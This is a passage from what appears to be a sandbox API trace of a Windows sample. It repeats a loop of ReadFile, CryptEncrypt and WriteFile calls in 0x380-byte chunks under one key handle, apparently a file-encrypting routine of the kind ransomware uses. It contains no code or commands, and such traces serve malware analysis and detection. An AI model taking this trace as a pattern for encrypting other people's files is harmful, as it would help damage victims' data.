lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.565] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.565] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.565] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.565] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.565] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.565] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.565] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.565] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.565] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.566] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.566] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.566] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.566] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.566] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.566] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.566] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.566] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.566] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.567] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.567] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.567] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.567] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.567] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.567] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.567] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.567] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.567] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.567] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.567] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.567] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.568] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.568] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.568] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.568] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.568] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.568] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.568] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.568] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.568] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.568] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.568] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.569] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.569] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.569] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.572] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.593] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.594] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.594] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.594] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.594] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.594] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.594] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.596] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.596] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.596] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.598] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.598] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.598] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.598] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.598] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.599] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.599] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.599] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 